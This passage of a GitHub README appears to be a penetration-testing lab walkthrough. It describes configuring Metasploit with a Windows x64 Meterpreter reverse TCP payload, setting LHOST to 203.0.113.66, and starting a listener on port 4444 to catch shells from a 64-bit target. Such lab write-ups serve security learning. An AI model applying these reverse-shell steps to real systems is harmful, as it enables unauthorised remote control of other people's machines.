kvweldon/Penetrating-an-Internal-Network/README.md

 ![image](https://github.com/kvweldon/Penetrating-an-Internal-Network/assets/141193154/b8291d92-cd56-40f7-b7ee-794163bd0e35)

 Below, I used the commands "set payload windows/x64/meterpreter/reverse_tcp" and "set LHOST 203.0.113.66" to update the configurations to reflect the payload I will utilize and the host.
+The x64 architecture version is used because the MS10 system is a 64-bit operating system.
+More relaible results occur when the architecture of the exploit and the OS match.

 I re-entered the "show options" command to reveal the updates I made.
 Once the correct configuration was input, I initiated the MSFConsole as the listener by entering "run".
 The MSFConsole is now listening on the host 203.0.113.66 on port 4444 for any connections.

 ![image](https://github.com/kvweldon/Penetrating-an-Internal-Network/assets/141193154/cc92f829-fd31-40ea-b41c-9d433a6a10aa)